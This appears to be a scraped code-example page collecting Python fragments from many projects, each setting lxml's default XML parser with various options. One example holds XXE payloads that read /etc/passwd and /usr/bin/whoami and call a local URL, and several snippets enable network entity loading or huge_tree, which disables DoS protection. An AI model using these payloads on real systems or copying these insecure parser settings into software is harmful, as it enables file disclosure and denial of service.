Beispiel #36
0
from xmodule.mako_module import MakoDescriptorSystem
from xmodule.modulestore import COURSE_ROOT, LIBRARY_ROOT, ModuleStoreEnum, ModuleStoreReadBase
from xmodule.modulestore.xml_exporter import DEFAULT_CONTENT_FIELDS
from xmodule.tabs import CourseTabList
from xmodule.x_module import (  # lint-amnesty, pylint: disable=unused-import
    AsideKeyGenerator, OpaqueKeyReader, XMLParsingSystem, policy_key)

from .exceptions import ItemNotFoundError
from .inheritance import InheritanceKeyValueStore, compute_inherited_metadata, inheriting_field_data

edx_xml_parser = etree.XMLParser(dtd_validation=False,
                                 load_dtd=False,
                                 remove_comments=True,
                                 remove_blank_text=True)

etree.set_default_parser(edx_xml_parser)

log = logging.getLogger(__name__)


class ImportSystem(XMLParsingSystem, MakoDescriptorSystem):  # lint-amnesty, pylint: disable=abstract-method, missing-class-docstring
    def __init__(
            self,
            xmlstore,
            course_id,
            course_dir,  # lint-amnesty, pylint: disable=too-many-statements
            error_tracker,
            load_error_modules=True,
            target_course_id=None,
            **kwargs):
        """
Beispiel #37
0
import traceback
import threading
from Queue import Queue


__author__ = 'leifj'


def _is_self_signed_err(ebuf):
    for e in ebuf:
        if e['func'] == 'xmlSecOpenSSLX509StoreVerify' and re.match('err=18', e['message']):
            return True
    return False


etree.set_default_parser(etree.XMLParser(resolve_entities=False))


def _e(error_log, m=None):
    def _f(x):
        if ":WARNING:" in x:
            return False
        if m is not None and not m in x:
            return False
        return True

    return "\n".join(filter(_f, ["%s" % e for e in error_log]))


class MetadataException(Exception):
    pass
Beispiel #38
0
parser.add_argument('-f', '-filePath', dest='filePath', help='Facebook chat log file (HTML file)',
                    default='raw/messages')
parser.add_argument("-max", "-maxExportedMessages", dest='maxExportedMessages', type=int, default=1000000,
                    help="maximum number of messages to export")
args = parser.parse_args()

maxExportedMessages = args.maxExportedMessages
ownName = args.ownName
filePath = args.filePath

data = []
warnedNameChanges = []
nbInvalidSender = 0

# make sure we don't crash if chat logs contain exotic characters
etree.set_default_parser(etree.XMLParser(encoding='utf-8', ns_clean=True, recover=True))

for filename in os.listdir(filePath):

    if not filename.endswith('.html'):
        continue

    archive = etree.parse(filePath + "/" + filename)

    conversationId = filename.replace('.html', '')
    groupConversation = False
    timestamp = ''
    senderName = ''
    conversationWithName = None
    text = ''
Beispiel #39
0
from lxml import etree

from django.db import models
from django.db.models import signals
from django.utils.translation import ugettext as _
from django.core import urlresolvers
from django.template import defaultfilters
from django.conf import settings
from django.core.cache import cache

import gdata.youtube
import gdata.youtube.service

logger = logging.getLogger(__name__)
# Prevent: XMLSyntaxError: Attempt to load network entity
etree.set_default_parser(etree.XMLParser(no_network=False, recover=True))

def youtube_entry_generator(entries, exclude=''):
    OK = (
        'Syndication of this video was restricted by its owner.',
    )

    for entry in entries:
        m = re.match(r'.*/([0-9A-Za-z_-]*)/?$', entry.id.text)
        if not m:
            continue
        if not m.group(1):
            continue
        if m.group(1) in exclude:
            continue
        yield entry
Beispiel #40
0
GNU Radio Companion is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA
"""

from lxml import etree

from .utils import odict

xml_failures = {}
etree.set_default_parser(etree.XMLParser(remove_comments=True))


class XMLSyntaxError(Exception):
    def __init__(self, error_log):
        self._error_log = error_log
        xml_failures[error_log.last_error.filename] = error_log

    def __str__(self):
        return '\n'.join(map(str, self._error_log.filter_from_errors()))


def validate_dtd(xml_file, dtd_file=None):
    """
    Validate an xml file against its dtd.
Beispiel #41
0
    def __init__(self, file_name=None, input_stream=None, language=None,
                 version="2.0", header=None, encoding="utf-8",
                 dtd_validation=False):
        """ Prepare the document basic structure."""
        self.encoding = encoding
        self.logger = getLogger(__name__)
        parser = etree.XMLParser(
            remove_comments=False, dtd_validation=dtd_validation)
        etree.set_default_parser(parser)

        if file_name:
            self.tree = etree.parse(file_name)
            self.root = self.tree.getroot()
        elif input_stream:
            if isinstance(input_stream, unicode):
                input_stream = input_stream.encode(encoding)
            self.root = etree.fromstring(input_stream)
            self.tree = etree.ElementTree(self.root)
        else:
            self.root = etree.Element(self.KAF_TAG, self.NS)
            self.tree = etree.ElementTree(self.root)
        if language:
            self.root.attrib[self.LANGUAGE_ATTRIBUTE] = language

        if version:
            self.root.set(self.VERSION_ATTRIBUTE, version)

        headers = self.tree.find(self.KAF_HEADER_TAG)
        if headers is not None and len(headers):
            self.kaf_header = headers
        else:
            # create nafheader element and put it in the beginning of
            # the document
            self.kaf_header = etree.Element(self.KAF_HEADER_TAG)
            self.root.insert(0, self.kaf_header)

        if header:
            self.set_header(header)

        raw_layer = self.tree.find(self.RAW_LAYER_TAG)
        if raw_layer is not None and len(raw_layer):
            self.raw = raw_layer
        else:
            self.raw = etree.SubElement(self.root, self.RAW_LAYER_TAG)

        text_layer = self.tree.find(self.TEXT_LAYER_TAG)
        if text_layer is not None and len(text_layer):
            self.text = text_layer
        else:
            self.text = etree.SubElement(self.root, self.TEXT_LAYER_TAG)

        terms_layer = self.tree.find(self.TERMS_LAYER_TAG)
        if text_layer is not None and len(terms_layer):
            self.terms = terms_layer
        else:
            self.terms = None

        dependencies_layer = self.tree.find(self.DEPENDENCY_LAYER_TAG)
        if dependencies_layer is not None and len(dependencies_layer):
            self.dependencies = dependencies_layer
        else:
            self.dependencies = None

        chunks_layer = self.tree.find(self.CHUNKS_LAYER_TAG)
        if chunks_layer is not None and len(chunks_layer):
            self.chunks = chunks_layer
        else:
            self.chunks = None

        constituency_layer = self.tree.find(self.CONSTITUENCY_LAYER)
        if constituency_layer is not None and len(constituency_layer):
            self.constituency = constituency_layer
        else:
            self.constituency = None

        named_entities_layer = self.tree.find(self.NAMED_ENTITIES_LAYER_TAG)
        if named_entities_layer is not None and len(named_entities_layer):
            self.entities = named_entities_layer
        else:
            self.entities = None

        coreference_layer = self.tree.find(self.COREFERENCE_LAYER_TAG)
        if coreference_layer is not None and len(coreference_layer):
            self.coreference = coreference_layer
        else:
            self.coreference = None
Beispiel #42
0
from itertools import chain
from lazy import lazy
from tempfile import NamedTemporaryFile as NamedTempFile

import regex as re
import random
from lxml import etree
from html import unescape

__all__ = ["Structure", "iterstruct", "config"]
__version__ = "0.0.0"

# disable security preventing DoS attacks with huge files
etree.set_default_parser(etree.ETCompatXMLParser(huge_tree=True))

STRUCTS = None


class Structure():
    """A structure extracted from a vertical.

    """
    def __init__(self, raw_vert, structs):
        self.raw = raw_vert.strip() + "\n"
        self.structs = structs
        first_line = self.raw.split("\n", maxsplit=1)[0]
        self.name = re.search(r"\w+", first_line).group()
        self.attr = dict(re.findall(r'(\w+)="(.*?)"', first_line))

    @lazy
    def xml(self):
Beispiel #43
0
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
'''


string_xml_external_url_1='''<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://127.0.0.1/1" >]><foo>&xxe;</foo>
'''


#Binary file (X)
string_xml_external_file='''<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE entity [
  <!ENTITY file SYSTEM "file:///usr/bin/whoami">
]>
<wooyun>
  <external>&file;</external>
</wooyun>
'''

xml_parse = etree.XMLParser(no_network=False)
etree.set_default_parser(xml_parse)
dom = etree.fromstring(string_xml_external_url)
node_internal = dom.xpath('//external')
print node_internal[0].text

Beispiel #44
0
        print("SKIP: validation of XHTML output in functional tests"
              " (lxml < 2.0, api incompatibility)")
        etree = None

    if etree:
        class _Resolver(etree.Resolver):
            base_dir = dirname(abspath(__file__))

            def resolve(self, system_url, public_id, context):
                return self.resolve_filename(join(self.base_dir,
                                                  system_url.split("/")[-1]),
                                             context)

        _parser = etree.XMLParser(dtd_validation=True)
        _parser.resolvers.add(_Resolver())
        etree.set_default_parser(_parser)

        def _format_error_log(data, log):
            msg = []
            for entry in log:
                context = data.splitlines()[max(0, entry.line - 5):
                                            entry.line + 6]
                msg.append("\n# %s\n# URL: %s\n# Line %d, column %d\n\n%s\n"
                           % (entry.message, entry.filename, entry.line,
                              entry.column, "\n".join([each.decode('utf-8')
                                                       for each in context])))
            return "\n".join(msg).encode('ascii', 'xmlcharrefreplace')

        def _validate_xhtml(func_name, *args, **kwargs):
            page = b.get_html()
            if "xhtml1-strict.dtd" not in page:
ERRORS = {
    'murano-engine.log': parse_log_file(os.path.join(LOG_PATH, "murano-engine.log")),
    'murano-api.log': parse_log_file(os.path.join(LOG_PATH, "murano-api.log")),
}

STATS = {
    'total': 0,
    'success': 0,
    'skip': 0,
    'error': 0,
    'failure': 0,
}

REPORT = {}

et.set_default_parser(et.XMLParser(huge_tree=True))

tree = et.parse(sys.argv[1])
root = tree.getroot()

STATS['total'] = int(root.attrib['tests'])
STATS['failure'] = int(root.attrib['failures'])
STATS['error'] = int(root.attrib['errors'])
STATS['skip'] = int(root.attrib['skip'])
STATS['unsuccess'] = STATS['failure'] + STATS['error'] + STATS['skip']
STATS['success'] = STATS['total'] - STATS['unsuccess']

for case in root:
    class_name = case.attrib['classname']

    screenshot_file = 'artifacts/screenshots/%s.png' % case.attrib['name']
Beispiel #46
0
    def __init__(self, infn, edxdir='.', org="UnivX", semester="2014_Spring", verbose=False, clean_up_html=True):
        if infn.endswith('.mbz'):
            # import gzip, tarfile
            # dir = tarfile.TarFile(fileobj=gzip.open(infn))
            infnabs = os.path.abspath(infn)
            d = os.path.abspath('out/tmp')
            mdir = tempfile.mkdtemp(prefix="moodle2edx", dir=d)
            curdir = os.path.abspath('.')
            os.chdir(mdir)
            print 'Temporary dir: {}'.format(mdir)
            os.system('unzip {} -d {} > /dev/null 2>&1'.format(infnabs, mdir))
            os.chdir(curdir)
        else:
            mdir = infn
    
        if not os.path.isdir(mdir):
            print "Input argument should be directory name or moodle *.mbz backup file"
            sys.exit(0)
    
        self.verbose = verbose
        self.edxdir = path(edxdir)
        self.moodle_dir = path(mdir)
        self.clean_up_html = clean_up_html

        if not self.edxdir.exists():
            os.mkdir(self.edxdir)
        def mkdir(mdir):
            if not os.path.exists('%s/%s' % (self.edxdir, mdir)):
                os.mkdir(self.edxdir / mdir)
        edirs = ['html', 'problem', 'course', 'static']
        for ed in edirs:
            mkdir(ed)

        self.URLNAMES = []

        mfn = 'moodle_backup.xml'	# top-level moodle backup xml
        qfn = 'questions.xml'	# moodle questions xml
    
        qdict = self.load_questions(mdir, qfn)
        self.convert_static_files()

        parser = etree.XMLParser(encoding='utf-8')
        etree.set_default_parser(parser)

        moodx = etree.parse('%s/%s' % (mdir, mfn))

        info = moodx.find('.//information')
        name = info.find('.//original_course_fullname').text
        number = info.find('.//original_course_shortname').text
        contents = moodx.find('.//contents')
        number = self.make_url_name(number, extra_ok_chars='.')
    
        # start course.xml
        cxml = etree.Element('course', graceperiod="1 day 5 hours 59 minutes 59 seconds")
        cxml.set('display_name',name)
        cxml.set('number', number)
        cxml.set('org','MITx')
    
        # place each activity as a new sequential inside a chapter
        # the chapter is specified by the section (moodle sectionid)
        # sections is dict with key=sectionid, value=chapter XML
        sections = {}

        self.load_moodle_course_head(cxml)	# load the course/course.xml if it has anything

        seq = None	# current sequential
        vert = None	# current vertical
        activities = contents.findall('.//activity')
        for activity in activities:
            seq, vert = self.activity2chapter(activity, sections, cxml, seq, vert, qdict)
            
        chapter = cxml.find('chapter')
        name = name.replace('/',' ')
        chapter.set('name',name)	# use first chapter for course name (FIXME)
    
        cdir = self.edxdir
        semester = self.make_url_name(semester)
        self.write_xml(cxml, '{}/course/{}.xml'.format(cdir, semester))

        # the actual top-level course.xml file is a pointer XML file to the one in course/semester.xml
        open('%s/course.xml' % cdir, 'w').write('<course url_name="%s" org="%s" course="%s"/>\n' % (semester, org, number))
Beispiel #47
0
from furl import furl
from lxml import etree

from scrapi import util
from scrapi import registry
from scrapi import settings
from scrapi.base.schemas import OAISCHEMA
from scrapi.linter.document import RawDocument, NormalizedDocument
from scrapi.base.transformer import XMLTransformer, JSONTransformer
from scrapi.base.helpers import updated_schema, build_properties, oai_get_records_and_token

logging.basicConfig(level=logging.INFO)

logger = logging.getLogger(__name__)

etree.set_default_parser(etree.XMLParser(recover=True))


class HarvesterMeta(abc.ABCMeta):
    def __init__(cls, name, bases, dct):
        super(HarvesterMeta, cls).__init__(name, bases, dct)
        if len(cls.__abstractmethods__
               ) == 0 and cls.short_name not in settings.disabled:
            registry[cls.short_name] = cls()
        else:
            logger.info('Class {} not added to registry'.format(cls.__name__))


@six.add_metaclass(HarvesterMeta)
class BaseHarvester(object):
    """ This is a base class that all harvesters should inheret from
Beispiel #48
0
from .parse_version import parse_version

import openerp
# get_encodings, ustr and exception_to_unicode were originally from tools.misc.
# There are moved to loglevels until we refactor tools.
from openerp.loglevels import get_encodings, ustr, exception_to_unicode  # noqa

_logger = logging.getLogger(__name__)

# List of etree._Element subclasses that we choose to ignore when parsing XML.
# We include the *Base ones just in case, currently they seem to be subclasses of the _* ones.
SKIPPED_ELEMENT_TYPES = (etree._Comment, etree._ProcessingInstruction,
                         etree.CommentBase, etree.PIBase, etree._Entity)

# Configure default global parser
etree.set_default_parser(etree.XMLParser(resolve_entities=False))

#----------------------------------------------------------
# Subprocesses
#----------------------------------------------------------


def find_in_path(name):
    path = os.environ.get('PATH', os.defpath).split(os.pathsep)
    if config.get('bin_path') and config['bin_path'] != 'None':
        path.append(config['bin_path'])
    return which(name, path=os.pathsep.join(path))


def _exec_pipe(prog, args, env=None):
    cmd = (prog, ) + args
                LAST_LOG_ENTRY['log'] += line

    return [log_record for log_record in LOG_RECORDS if log_record['level'] == "ERROR"]


STATS = {
    'total': 0,
    'success': 0,
    'skip': 0,
    'error': 0,
    'failure': 0,
}

REPORT = {}

et.set_default_parser(et.XMLParser(huge_tree=True))

tree = et.parse(sys.argv[1])
root = tree.getroot()

STATS['total'] = int(root.attrib['tests'])
STATS['failure'] = int(root.attrib['failures'])
STATS['error'] = int(root.attrib['errors'])
STATS['skip'] = int(root.attrib['skip'])
STATS['unsuccess'] = STATS['failure'] + STATS['error'] + STATS['skip']
STATS['success'] = STATS['total'] - STATS['unsuccess']

for case in root:
    class_name = case.attrib['classname']

    screenshot_file = 'logs/artifacts/screenshots/%s.png' % case.attrib['name']
Beispiel #50
0
from opaque_keys.edx.keys import UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey

from xblock.field_data import DictFieldData
from xblock.runtime import DictKeyValueStore, IdGenerator

from . import ModuleStoreReadBase, Location, XML_MODULESTORE_TYPE

from .exceptions import ItemNotFoundError
from .inheritance import compute_inherited_metadata, inheriting_field_data

from xblock.fields import ScopeIds, Reference, ReferenceList, ReferenceValueDict

edx_xml_parser = etree.XMLParser(dtd_validation=False, load_dtd=False, remove_comments=True, remove_blank_text=True)

etree.set_default_parser(edx_xml_parser)

log = logging.getLogger(__name__)


# VS[compat]
# TODO (cpennington): Remove this once all fall 2012 courses have been imported
# into the cms from xml
def clean_out_mako_templating(xml_string):
    xml_string = xml_string.replace("%include", "include")
    xml_string = re.sub(r"(?m)^\s*%.*$", "", xml_string)
    return xml_string


class ImportSystem(XMLParsingSystem, MakoDescriptorSystem):
    def __init__(
Beispiel #51
0
import logging
import time
import sha
import urllib
import os.path
import shutil
from lxml import etree

from django.conf import settings
from django.db.models import get_model

# Prevent: XMLSyntaxError: Attempt to load network entity
etree.set_default_parser(etree.XMLParser(no_network=False, recover=True))

logger = logging.getLogger('gsm')


def get_object_from_url(url):
    data = []
    Sport = get_model('gsm', 'sport')
    GsmEntity = get_model('gsm', 'gsmentity')
    sports = Sport.objects.all().values_list('slug', flat=True)
    for part in url.split('/'):
        if part in sports:
            data.append(part)
        elif 1 <= len(data) and len(data) < 3:
            data.append(part)
    return GsmEntity.objects.get(sport__slug=data[0],
                                 tag=data[1],
                                 gsm_id=data[2])
Beispiel #52
0
from lxml import etree

from oaipmh.metadata import MetadataRegistry

from django.utils.datastructures import MultiValueDict
from django.contrib.auth.models import User

from libros.bookreader.models import Book, Page, Annotation, Link, Transcription
from libros.bookreader.harvesting.metadata import metadata_registry



log = getLogger('bookreader.harvesting.book')

etree.set_default_parser(etree.XMLParser(dtd_validation=False, load_dtd=False,
                                         no_network=False))

class BookHarvester(object):
    def __init__(self, book, metadata_registry=metadata_registry, bundle_prefix='ore'):
        assert isinstance(book, Book)
        assert isinstance(metadata_registry, MetadataRegistry)
        
        self.book = book
        self.repository = book.collection.repository.connection(metadata_registry=metadata_registry)
        self._bundle_prefix = bundle_prefix
    
    def _set_additional_metadata(self, field, value):
        """ If a value does not equate to false, set the field in the 
        additional_metadata multi-valued dictionary"""
        if not value:
            return
Beispiel #53
0
import logging
from lxml import etree

from django.core.management.base import NoArgsCommand
from django.conf import settings

from music.models import *

etree.set_default_parser(etree.XMLParser(no_network=False))

letters = [chr(i) for i in xrange(ord('a'), ord('z')+1)]
letters = ['a']

class Command(NoArgsCommand):
    help = "Synchronise lastfm artist, track and album database."
   
    def handle_noargs(self, **options):
        logging.basicConfig(level=logging.DEBUG, format="%(message)s")
        logging.info("-" * 72)

        for letter in letters:
            total_pages = None

            url = 'http://ws.audioscrobbler.com/2.0/?api_key=%s&method=%s&artist=%s&page=%s' % (
                settings.LASTFM_API_KEY,
                'artist.search',
                letter,
                1
            )

            tree = etree.parse(url)